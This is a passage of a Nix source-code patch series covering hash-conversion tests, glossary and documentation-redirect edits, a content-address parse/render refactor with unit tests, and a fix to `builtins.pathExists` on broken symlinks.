-    h32=$(nix-hash --type "$1" --to-base32 "$2")
-    [ "$h32" = "$3" ]
-    h32=$(nix hash to-base32 --type "$1" "$2")
-    [ "$h32" = "$3" ]
-    h16=$(nix-hash --type "$1" --to-base16 "$h32")
-    [ "$h16" = "$2" ]
-
-    h16=$(nix hash convert --hash-algo "$1" --to base16 "$h64")
-    [ "$h16" = "$2" ]
-    h16=$(nix hash to-base16 --type "$1" "$h64")
-    [ "$h16" = "$2" ]
-    h16=$(nix hash convert --to base16 "$sri")
-    [ "$h16" = "$2" ]
-    h16=$(nix hash to-base16 "$sri")
-    [ "$h16" = "$2" ]
-
-    #
-    # Converting from SRI
-    #
-
-    # Input hash algo auto-detected from SRI and output defaults to SRI as well.
-    sri=$(nix hash convert "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --from sri "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --to sri "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --from sri --to sri "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --to base64 "$1-$4")
-    [ "$sri" = "$4" ]
-
-    #
-    # Auto-detecting the input from algo and length.
-    #
-
-    sri=$(nix hash convert --hash-algo "$1" "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$3")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --hash-algo "$1" "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$3")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$4")
-    [ "$sri" = "$1-$4" ]
-
-    #
-    # Asserting input format succeeds.
-    #
-
-    sri=$(nix hash convert --hash-algo "$1" --from base16 "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" --from nix32 "$3")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" --from base64 "$4")
-    [ "$sri" = "$1-$4" ]
-
-    #
-    # Asserting input format fails.
-    #
-
-    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?")
-    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
-    fail=$(nix hash convert --hash-algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?")
-    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
-    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?")
-    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
-
-}
-
-try3 sha1 "800d59cfcd3c05e900cb4e214be48f6b886a08df" "vw46m23bizj4n8afrc0fj19wrp7mj3c0" "gA1Zz808BekAy04hS+SPa4hqCN8="
-try3 sha256 "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0="
-try3 sha512 "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" "12k9jiq29iyqm03swfsgiw5mlqs173qazm3n7daz43infy12pyrcdf30fkk3qwv4yl2ick8yipc2mqnlh48xsvvxl60lbx8vp38yji0" "IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ=="
diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index f369c7c2c..18eb887cd 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -47,7 +47,8 @@ nix_tests = \
   optimise-store.sh \
   substitute-with-invalid-ca.sh \
   signing.sh \
-  hash.sh \
+  hash-convert.sh \
+  hash-path.sh \
   gc-non-blocking.sh \
   check.sh \
   nix-shell.sh \

From 5b69409f6b479ff28870c0502682882ee14a9dc8 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 16:08:44 +0100
Subject: [PATCH 465/654] only refer to the local store page

---
 doc/manual/src/glossary.md | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 51f1e3a71..6126b7e47 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -68,10 +68,6 @@
 
 - [local store]{#gloss-local-store}
 
-  From the perspective of the location where Nix is invoked, the Nix [store] can be referred to _local_ or _remote_.
-  Only a local store exposes a file system directory, typically `/nix/store`, to allow operating system processes to directly access store objects.
-  Local stores can be used for building [derivations][derivation].
-
   See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
 
   [local store]: #gloss-local-store

From bb2189235100a551ab416ff301bef6efd3adbc66 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 7 Feb 2024 15:41:10 +0100
Subject: [PATCH 466/654] *.in files: Depend on config.status

---
 mk/templates.mk | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/mk/templates.mk b/mk/templates.mk
index 866bdc17f..d5dae61c7 100644
--- a/mk/templates.mk
+++ b/mk/templates.mk
@@ -10,10 +10,10 @@ endef
 
 ifneq ($(MAKECMDGOALS), clean)
 
-$(buildprefix)%.h: %.h.in
+$(buildprefix)%.h: %.h.in $(buildprefix)config.status
 	$(trace-gen) rm -f $@ && cd $(buildprefixrel) && ./config.status --quiet --header=$(@:$(buildprefix)%=%)
 
-$(buildprefix)%: %.in
+$(buildprefix)%: %.in $(buildprefix)config.status
 	$(trace-gen) rm -f $@ && cd $(buildprefixrel) && ./config.status --quiet --file=$(@:$(buildprefix)%=%)
 
 endif

From f27205f743fcfd05126f5fa7cc83eefea7873f1f Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 16:25:07 +0100
Subject: [PATCH 467/654] redirect local and chroot store to main page

---
 doc/manual/redirects.js    |  6 +++++-
 doc/manual/src/glossary.md | 11 +----------
 2 files changed, 6 insertions(+), 11 deletions(-)

diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js
index d04f32b49..e25b17c76 100644
--- a/doc/manual/redirects.js
+++ b/doc/manual/redirects.js
@@ -358,7 +358,11 @@ const redirects = {
     "one-time-setup": "testing.html#one-time-setup",
     "using-the-ci-generated-installer-for-manual-testing": "testing.html#using-the-ci-generated-installer-for-manual-testing",
     "characterization-testing": "#characterisation-testing-unit",
-  }
+  },
+  "glossary.html": {
+    "gloss-local-store": "store/types/local-store.html",
+    "gloss-chroot-store": "store/types/local-store.html",
+  },
 };
 
 // the following code matches the current page's URL against the set of redirects.
diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 6126b7e47..d257a8189 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -66,16 +66,6 @@
 
   [store]: #gloss-store
 
-- [local store]{#gloss-local-store}
-
-  See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
-
-  [local store]: #gloss-local-store
-
-- [chroot store]{#gloss-chroot-store}
-
-  A [local store] whose canonical path is anything other than `/nix/store`.
-
 - [binary cache]{#gloss-binary-cache}
 
   A *binary cache* is a Nix store which uses a different format: its
@@ -242,6 +232,7 @@
   - All paths in the store path's [closure] are valid.
 
   [validity]: #gloss-validity
+  [local store]: @docroot@/store/types/local-store.md
 
 - [user environment]{#gloss-user-env}
 

From 41dd9857c7dbd8a2df9c8da4b7cf8e0399088452 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 09:54:07 -0500
Subject: [PATCH 468/654] Proper `parse` and `render` functions for
 `FileIngestionMethod` and `ContentAddressMethod`

No outward facing behavior is changed.

Older methods with same names that operate on on method + algo pair (for
old-style `:algo`) are renamed to `*WithAlgo`.)

The functions are unit-tested in the same way the names for the hash
algorithms are tested.
---
 src/libstore/content-address.cc            | 31 +++++++++++++++----
 src/libstore/content-address.hh            | 22 +++++++++++---
 src/libstore/daemon.cc                     |  2 +-
 src/libstore/derivations.cc                | 12 ++++----
 src/libstore/remote-store.cc               |  2 +-
 src/libutil/file-content-address.cc        | 25 ++++++++++++++++
 src/libutil/file-content-address.hh        | 17 +++++++++++
 src/nix/add-to-store.cc                    | 13 +-------
 tests/unit/libstore/content-address.cc     | 35 ++++++++++++++++++++++
 tests/unit/libutil/file-content-address.cc | 33 ++++++++++++++++++++
 10 files changed, 162 insertions(+), 30 deletions(-)
 create mode 100644 tests/unit/libstore/content-address.cc
 create mode 100644 tests/unit/libutil/file-content-address.cc

diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc
index fc408f5af..2091f8e02 100644
--- a/src/libstore/content-address.cc
+++ b/src/libstore/content-address.cc
@@ -4,7 +4,7 @@
 
 namespace nix {
 
-std::string makeFileIngestionPrefix(FileIngestionMethod m)
+std::string_view makeFileIngestionPrefix(FileIngestionMethod m)
 {
     switch (m) {
     case FileIngestionMethod::Flat:
@@ -16,10 +16,29 @@ std::string makeFileIngestionPrefix(FileIngestionMethod m)
     }
 }
 
-std::string ContentAddressMethod::renderPrefix() const
+std::string_view ContentAddressMethod::render() const
 {
     return std::visit(overloaded {
-        [](TextIngestionMethod) -> std::string { return "text:"; },
+        [](TextIngestionMethod) -> std::string_view { return "text"; },
+        [](FileIngestionMethod m2) {
+             /* Not prefixed for back compat with things that couldn't produce text before. */
+            return renderFileIngestionMethod(m2);
+        },
+    }, raw);
+}
+
+ContentAddressMethod ContentAddressMethod::parse(std::string_view m)
+{
+    if (m == "text")
+        return TextIngestionMethod {};
+    else
+        return parseFileIngestionMethod(m);
+}
+
+std::string_view ContentAddressMethod::renderPrefix() const
+{
+    return std::visit(overloaded {
+        [](TextIngestionMethod) -> std::string_view { return "text:"; },
         [](FileIngestionMethod m2) {
              /* Not prefixed for back compat with things that couldn't produce text before. */
             return makeFileIngestionPrefix(m2);
@@ -38,7 +57,7 @@ ContentAddressMethod ContentAddressMethod::parsePrefix(std::string_view & m)
     return FileIngestionMethod::Flat;
 }
 
-std::string ContentAddressMethod::render(HashAlgorithm ha) const
+std::string ContentAddressMethod::renderWithAlgo(HashAlgorithm ha) const
 {
     return std::visit(overloaded {
         [&](const TextIngestionMethod & th) {
@@ -133,7 +152,7 @@ ContentAddress ContentAddress::parse(std::string_view rawCa)
     };
 }
 
-std::pair ContentAddressMethod::parse(std::string_view caMethod)
+std::pair ContentAddressMethod::parseWithAlgo(std::string_view caMethod)
 {
     std::string asPrefix = std::string{caMethod} + ":";
     // parseContentAddressMethodPrefix takes its argument by reference
@@ -155,7 +174,7 @@ std::string renderContentAddress(std::optional ca)
 
 std::string ContentAddress::printMethodAlgo() const
 {
-    return method.renderPrefix()
+    return std::string { method.renderPrefix() }
         + printHashAlgo(hash.algo);
 }
 
diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh
index f0973412b..80538df50 100644
--- a/src/libstore/content-address.hh
+++ b/src/libstore/content-address.hh
@@ -36,7 +36,7 @@ struct TextIngestionMethod : std::monostate { };
  * Compute the prefix to the hash algorithm which indicates how the
  * files were ingested.
  */
-std::string makeFileIngestionPrefix(FileIngestionMethod m);
+std::string_view makeFileIngestionPrefix(FileIngestionMethod m);
 
 /**
  * An enumeration of all the ways we can content-address store objects.
@@ -59,6 +59,20 @@ struct ContentAddressMethod
 
     MAKE_WRAPPER_CONSTRUCTOR(ContentAddressMethod);
 
+    /**
+     * Parse a content addressing method (name).
+     *
+     * The inverse of `render`.
+     */
+    static ContentAddressMethod parse(std::string_view rawCaMethod);
+
+    /**
+     * Render a content addressing method (name).
+     *
+     * The inverse of `parse`.
+     */
+    std::string_view render() const;
+
     /**
      * Parse the prefix tag which indicates how the files
      * were ingested, with the fixed output case not prefixed for back
@@ -74,12 +88,12 @@ struct ContentAddressMethod
      *
      * The rough inverse of `parsePrefix()`.
      */
-    std::string renderPrefix() const;
+    std::string_view renderPrefix() const;
 
     /**
      * Parse a content addressing method and hash type.
      */
-    static std::pair parse(std::string_view rawCaMethod);
+    static std::pair parseWithAlgo(std::string_view rawCaMethod);
 
     /**
      * Render a content addressing method and hash type in a
@@ -87,7 +101,7 @@ struct ContentAddressMethod
      *
      * The rough inverse of `parse()`.
      */
-    std::string render(HashAlgorithm ht) const;
+    std::string renderWithAlgo(HashAlgorithm ht) const;
 
     /**
      * Get the underlying way to content-address file system objects.
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index 8db93fa39..cf5020dfe 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -400,7 +400,7 @@ static void performOp(TunnelLogger * logger, ref store,
             logger->startWork();
             auto pathInfo = [&]() {
                 // NB: FramedSource must be out of scope before logger->stopWork();
-                auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parse(camStr);
+                auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parseWithAlgo(camStr);
                 auto hashAlgo = hashAlgo_; // work around clang bug
                 FramedSource source(from);
                 // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc
index 393806652..36042c06c 100644
--- a/src/libstore/derivations.cc
+++ b/src/libstore/derivations.cc
@@ -601,7 +601,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs,
             },
             [&](const DerivationOutput::CAFloating & dof) {
                 s += ','; printUnquotedString(s, "");
-                s += ','; printUnquotedString(s, dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo));
+                s += ','; printUnquotedString(s, std::string { dof.method.renderPrefix() } + printHashAlgo(dof.hashAlgo));
                 s += ','; printUnquotedString(s, "");
             },
             [&](const DerivationOutput::Deferred &) {
@@ -612,7 +612,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs,
             [&](const DerivationOutput::Impure & doi) {
                 // FIXME
                 s += ','; printUnquotedString(s, "");
-                s += ','; printUnquotedString(s, doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo));
+                s += ','; printUnquotedString(s, std::string { doi.method.renderPrefix() } + printHashAlgo(doi.hashAlgo));
                 s += ','; printUnquotedString(s, "impure");
             }
         }, i.second.raw);
@@ -984,7 +984,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva
             },
             [&](const DerivationOutput::CAFloating & dof) {
                 out << ""
-                    << (dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo))
+                    << (std::string { dof.method.renderPrefix() } + printHashAlgo(dof.hashAlgo))
                     << "";
             },
             [&](const DerivationOutput::Deferred &) {
@@ -994,7 +994,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva
             },
             [&](const DerivationOutput::Impure & doi) {
                 out << ""
-                    << (doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo))
+                    << (std::string { doi.method.renderPrefix() } + printHashAlgo(doi.hashAlgo))
                     << "impure";
             },
         }, i.second.raw);
@@ -1221,11 +1221,11 @@ nlohmann::json DerivationOutput::toJSON(
             // FIXME print refs?
         },
         [&](const DerivationOutput::CAFloating & dof) {
-            res["hashAlgo"] = dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo);
+            res["hashAlgo"] = std::string { dof.method.renderPrefix() } + printHashAlgo(dof.hashAlgo);
         },
         [&](const DerivationOutput::Deferred &) {},
         [&](const DerivationOutput::Impure & doi) {
-            res["hashAlgo"] = doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo);
+            res["hashAlgo"] = std::string { doi.method.renderPrefix() } + printHashAlgo(doi.hashAlgo);
             res["impure"] = true;
         },
     }, raw);
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index ccf95beef..fadef45ff 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -435,7 +435,7 @@ ref RemoteStore::addCAToStore(
         conn->to
             << WorkerProto::Op::AddToStore
             << name
-            << caMethod.render(hashAlgo);
+            << caMethod.renderWithAlgo(hashAlgo);
         WorkerProto::write(*this, *conn, references);
         conn->to << repair;
 
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 9917986f6..6ea7b2ab4 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -3,6 +3,31 @@
 
 namespace nix {
 
+FileIngestionMethod parseFileIngestionMethod(std::string_view input)
+{
+    if (input == "flat") {
+        return FileIngestionMethod::Flat;
+    } else if (input == "nar") {
+        return FileIngestionMethod::Recursive;
+    } else {
+        throw UsageError("Unknown file ingestion method '%s', expect `flat` or `nar`");
+    }
+}
+
+
+std::string_view renderFileIngestionMethod(FileIngestionMethod method)
+{
+    switch (method) {
+    case FileIngestionMethod::Flat:
+        return "flat";
+    case FileIngestionMethod::Recursive:
+        return "nar";
+    default:
+        assert(false);
+    }
+}
+
+
 void dumpPath(
     SourceAccessor & accessor, const CanonPath & path,
     Sink & sink,
diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh
index 7f7544e41..41f23f2af 100644
--- a/src/libutil/file-content-address.hh
+++ b/src/libutil/file-content-address.hh
@@ -23,6 +23,23 @@ enum struct FileIngestionMethod : uint8_t {
     Recursive = 1,
 };
 
+/**
+ * Parse a `FileIngestionMethod` by name. Choice of:
+ *
+ *  - `flat`: `FileIngestionMethod::Flat`
+ *  - `nar`: `FileIngestionMethod::Recursive`
+ *
+ * Oppostite of `renderFileIngestionMethod`.
+ */
+FileIngestionMethod parseFileIngestionMethod(std::string_view input);
+
+/**
+ * Render a `FileIngestionMethod` by name.
+ *
+ * Oppostite of `parseFileIngestionMethod`.
+ */
+std::string_view renderFileIngestionMethod(FileIngestionMethod method);
+
 /**
  * Dump a serialization of the given file system object.
  */
diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc
index d3e66dc21..9ea37ab4c 100644
--- a/src/nix/add-to-store.cc
+++ b/src/nix/add-to-store.cc
@@ -6,17 +6,6 @@
 
 using namespace nix;
 
-static FileIngestionMethod parseIngestionMethod(std::string_view input)
-{
-    if (input == "flat") {
-        return FileIngestionMethod::Flat;
-    } else if (input == "nar") {
-        return FileIngestionMethod::Recursive;
-    } else {
-        throw UsageError("Unknown hash mode '%s', expect `flat` or `nar`");
-    }
-}
-
 struct CmdAddToStore : MixDryRun, StoreCommand
 {
     Path path;
@@ -49,7 +38,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand
             )",
             .labels = {"hash-mode"},
             .handler = {[this](std::string s) {
-                this->caMethod = parseIngestionMethod(s);
+                this->caMethod = parseFileIngestionMethod(s);
             }},
         });
 
diff --git a/tests/unit/libstore/content-address.cc b/tests/unit/libstore/content-address.cc
new file mode 100644
index 000000000..98c1eace3
--- /dev/null
+++ b/tests/unit/libstore/content-address.cc
@@ -0,0 +1,35 @@
+#include 
+
+#include "content-address.hh"
+
+namespace nix {
+
+/* ----------------------------------------------------------------------------
+ * ContentAddressMethod::parse, ContentAddressMethod::render
+ * --------------------------------------------------------------------------*/
+
+TEST(ContentAddressMethod, testRoundTripPrintParse_1) {
+    for (const ContentAddressMethod & cam : {
+        ContentAddressMethod { TextIngestionMethod {} },
+        ContentAddressMethod { FileIngestionMethod::Flat },
+        ContentAddressMethod { FileIngestionMethod::Recursive },
+    }) {
+        EXPECT_EQ(ContentAddressMethod::parse(cam.render()), cam);
+    }
+}
+
+TEST(ContentAddressMethod, testRoundTripPrintParse_2) {
+    for (const std::string_view camS : {
+        "text",
+        "flat",
+        "nar",
+    }) {
+        EXPECT_EQ(ContentAddressMethod::parse(camS).render(), camS);
+    }
+}
+
+TEST(ContentAddressMethod, testParseContentAddressMethodOptException) {
+    EXPECT_THROW(ContentAddressMethod::parse("narwhal"), UsageError);
+}
+
+}
diff --git a/tests/unit/libutil/file-content-address.cc b/tests/unit/libutil/file-content-address.cc
new file mode 100644
index 000000000..2e819ce40
--- /dev/null
+++ b/tests/unit/libutil/file-content-address.cc
@@ -0,0 +1,33 @@
+#include 
+
+#include "file-content-address.hh"
+
+namespace nix {
+
+/* ----------------------------------------------------------------------------
+ * parseFileIngestionMethod, renderFileIngestionMethod
+ * --------------------------------------------------------------------------*/
+
+TEST(FileIngestionMethod, testRoundTripPrintParse_1) {
+    for (const FileIngestionMethod fim : {
+        FileIngestionMethod::Flat,
+        FileIngestionMethod::Recursive,
+    }) {
+        EXPECT_EQ(parseFileIngestionMethod(renderFileIngestionMethod(fim)), fim);
+    }
+}
+
+TEST(FileIngestionMethod, testRoundTripPrintParse_2) {
+    for (const std::string_view fimS : {
+        "flat",
+        "nar",
+    }) {
+        EXPECT_EQ(renderFileIngestionMethod(parseFileIngestionMethod(fimS)), fimS);
+    }
+}
+
+TEST(FileIngestionMethod, testParseFileIngestionMethodOptException) {
+    EXPECT_THROW(parseFileIngestionMethod("narwhal"), UsageError);
+}
+
+}

From db41a0616a42f8fb52b189f7fd05c2f09764426f Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 11:14:49 -0500
Subject: [PATCH 469/654] Use `ContentAddressMethod::render` in one more place

Good to deduplicate the code.
---
 src/libfetchers/fetch-to-store.cc | 18 ++----------------
 1 file changed, 2 insertions(+), 16 deletions(-)

diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc
index 196489e05..c27880662 100644
--- a/src/libfetchers/fetch-to-store.cc
+++ b/src/libfetchers/fetch-to-store.cc
@@ -21,23 +21,9 @@ StorePath fetchToStore(
         cacheKey = fetchers::Attrs{
             {"_what", "fetchToStore"},
             {"store", store.storeDir},
-            {"name", std::string(name)},
+            {"name", std::string{name}},
             {"fingerprint", *path.accessor->fingerprint},
-            {
-                "method",
-                std::visit(overloaded {
-                    [](const TextIngestionMethod &) {
-                        return "text";
-                    },
-                    [](const FileIngestionMethod & fim) {
-                        switch (fim) {
-                        case FileIngestionMethod::Flat: return "flat";
-                        case FileIngestionMethod::Recursive: return "nar";
-                        default: assert(false);
-                        }
-                    },
-                }, method.raw),
-            },
+            {"method", std::string{method.render()}},
             {"path", path.path.abs()}
         };
         if (auto res = fetchers::getCache()->lookup(store, *cacheKey)) {

From 89e21ab4bd1561c6eab2eeb63088f4e34fa4059f Mon Sep 17 00:00:00 2001
From: Alois Wohlschlager 
Date: Sat, 10 Feb 2024 20:56:54 +0100
Subject: [PATCH 470/654] Restore `builtins.pathExists` behavior on broken
 symlinks

Commit 83c067c0fa0cc5a2dca440e5c986afe40b163802 changed `builtins.pathExists`
to resolve symlinks before checking for existence. Consequently, if the path
refers to a symlink itself, existence of the target of the symlink (instead of
the symlink itself) was checked. Restore the previous behavior by skipping
symlink resolution in the last component.
---
 src/libexpr/primops.cc                        | 15 +++++++-----
 src/libutil/source-path.cc                    | 22 ++++++++++-------
 src/libutil/source-path.hh                    | 24 +++++++++++++++----
 .../functional/lang/eval-okay-pathexists.nix  |  3 +++
 .../functional/lang/symlink-resolution/broken |  1 +
 5 files changed, 46 insertions(+), 19 deletions(-)
 create mode 120000 tests/functional/lang/symlink-resolution/broken

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 8c6aeffac..dde7c0fe7 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -115,7 +115,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context)
     return res;
 }
 
-static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bool resolveSymlinks = true)
+static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, std::optional resolveSymlinks = SymlinkResolution::Full)
 {
     NixStringContext context;
 
@@ -127,7 +127,7 @@ static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bo
             auto realPath = state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context);
             path = {path.accessor, CanonPath(realPath)};
         }
-        return resolveSymlinks ? path.resolveSymlinks() : path;
+        return resolveSymlinks ? path.resolveSymlinks(*resolveSymlinks) : path;
     } catch (Error & e) {
         e.addTrace(state.positions[pos], "while realising the context of path '%s'", path);
         throw;
@@ -167,7 +167,7 @@ static void mkOutputString(
    argument. */
 static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * vScope, Value & v)
 {
-    auto path = realisePath(state, pos, vPath, false);
+    auto path = realisePath(state, pos, vPath, std::nullopt);
     auto path2 = path.path.abs();
 
     // FIXME
@@ -1521,13 +1521,16 @@ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args,
     try {
         auto & arg = *args[0];
 
-        auto path = realisePath(state, pos, arg);
-
         /* SourcePath doesn't know about trailing slash. */
+        state.forceValue(arg, pos);
         auto mustBeDir = arg.type() == nString
             && (arg.string_view().ends_with("/")
                 || arg.string_view().ends_with("/."));
 
+        auto symlinkResolution =
+            mustBeDir ? SymlinkResolution::Full : SymlinkResolution::Ancestors;
+        auto path = realisePath(state, pos, arg, symlinkResolution);
+
         auto st = path.maybeLstat();
         auto exists = st && (!mustBeDir || st->type == SourceAccessor::tDirectory);
         v.mkBool(exists);
@@ -1765,7 +1768,7 @@ static std::string_view fileTypeToString(InputAccessor::Type type)
 
 static void prim_readFileType(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 {
-    auto path = realisePath(state, pos, *args[0], false);
+    auto path = realisePath(state, pos, *args[0], std::nullopt);
     /* Retrieve the directory entry type and stringize it. */
     v.mkString(fileTypeToString(path.lstat().type));
 }
diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc
index 341daf39c..66c95405f 100644
--- a/src/libutil/source-path.cc
+++ b/src/libutil/source-path.cc
@@ -62,7 +62,7 @@ bool SourcePath::operator<(const SourcePath & x) const
     return std::tie(*accessor, path) < std::tie(*x.accessor, x.path);
 }
 
-SourcePath SourcePath::resolveSymlinks() const
+SourcePath SourcePath::resolveSymlinks(SymlinkResolution mode) const
 {
     auto res = SourcePath(accessor);
 
@@ -72,6 +72,8 @@ SourcePath SourcePath::resolveSymlinks() const
     for (auto & c : path)
         todo.push_back(std::string(c));
 
+    bool resolve_last = mode == SymlinkResolution::Full;
+
     while (!todo.empty()) {
         auto c = *todo.begin();
         todo.pop_front();
@@ -81,14 +83,16 @@ SourcePath SourcePath::resolveSymlinks() const
             res.path.pop();
         else {
             res.path.push(c);
-            if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) {
-                if (!linksAllowed--)
-                    throw Error("infinite symlink recursion in path '%s'", path);
-                auto target = res.readLink();
-                res.path.pop();
-                if (hasPrefix(target, "/"))
-                    res.path = CanonPath::root;
-                todo.splice(todo.begin(), tokenizeString>(target, "/"));
+            if (resolve_last || !todo.empty()) {
+                if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) {
+                    if (!linksAllowed--)
+                        throw Error("infinite symlink recursion in path '%s'", path);
+                    auto target = res.readLink();
+                    res.path.pop();
+                    if (hasPrefix(target, "/"))
+                        res.path = CanonPath::root;
+                    todo.splice(todo.begin(), tokenizeString>(target, "/"));
+                }
             }
         }
     }
diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh
index bde07b08f..b4cfa9ce8 100644
--- a/src/libutil/source-path.hh
+++ b/src/libutil/source-path.hh
@@ -11,6 +11,22 @@
 
 namespace nix {
 
+enum class SymlinkResolution {
+    /**
+     * Resolve symlinks in the ancestors only.
+     *
+     * Only the last component of the result is possibly a symlink.
+     */
+    Ancestors,
+
+    /**
+     * Resolve symlinks fully, realpath(3)-style.
+     *
+     * No component of the result will be a symlink.
+     */
+    Full,
+};
+
 /**
  * An abstraction for accessing source files during
  * evaluation. Currently, it's just a wrapper around `CanonPath` that
@@ -103,11 +119,11 @@ struct SourcePath
     bool operator<(const SourcePath & x) const;
 
     /**
-     * Resolve any symlinks in this `SourcePath` (including its
-     * parents). The result is a `SourcePath` in which no element is a
-     * symlink.
+     * Resolve any symlinks in this `SourcePath` according to the
+     * given resolution mode.
      */
-    SourcePath resolveSymlinks() const;
+    SourcePath resolveSymlinks(
+        SymlinkResolution mode = SymlinkResolution::Full) const;
 };
 
 std::ostream & operator << (std::ostream & str, const SourcePath & path);
diff --git a/tests/functional/lang/eval-okay-pathexists.nix b/tests/functional/lang/eval-okay-pathexists.nix
index 31697f66a..022b22fea 100644
--- a/tests/functional/lang/eval-okay-pathexists.nix
+++ b/tests/functional/lang/eval-okay-pathexists.nix
@@ -29,3 +29,6 @@ builtins.pathExists (./lib.nix)
 && builtins.pathExists (builtins.toPath { outPath = builtins.toString ./lib.nix; })
 && builtins.pathExists ./lib.nix
 && !builtins.pathExists ./bla.nix
+&& builtins.pathExists ./symlink-resolution/foo/overlays/overlay.nix
+&& builtins.pathExists ./symlink-resolution/broken
+&& builtins.pathExists (builtins.toString ./symlink-resolution/foo/overlays + "/.")
diff --git a/tests/functional/lang/symlink-resolution/broken b/tests/functional/lang/symlink-resolution/broken
new file mode 120000
index 000000000..e07da690b
--- /dev/null
+++ b/tests/functional/lang/symlink-resolution/broken
@@ -0,0 +1 @@
+nonexistent
\ No newline at end of file

From 9d64613dcac181f889f6831a08404e2483d41da4 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 12:50:10 -0500
Subject: [PATCH 471/654] Update src/libutil/file-content-address.cc

---
 src/libutil/file-content-address.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 6ea7b2ab4..6753e0f49 100644
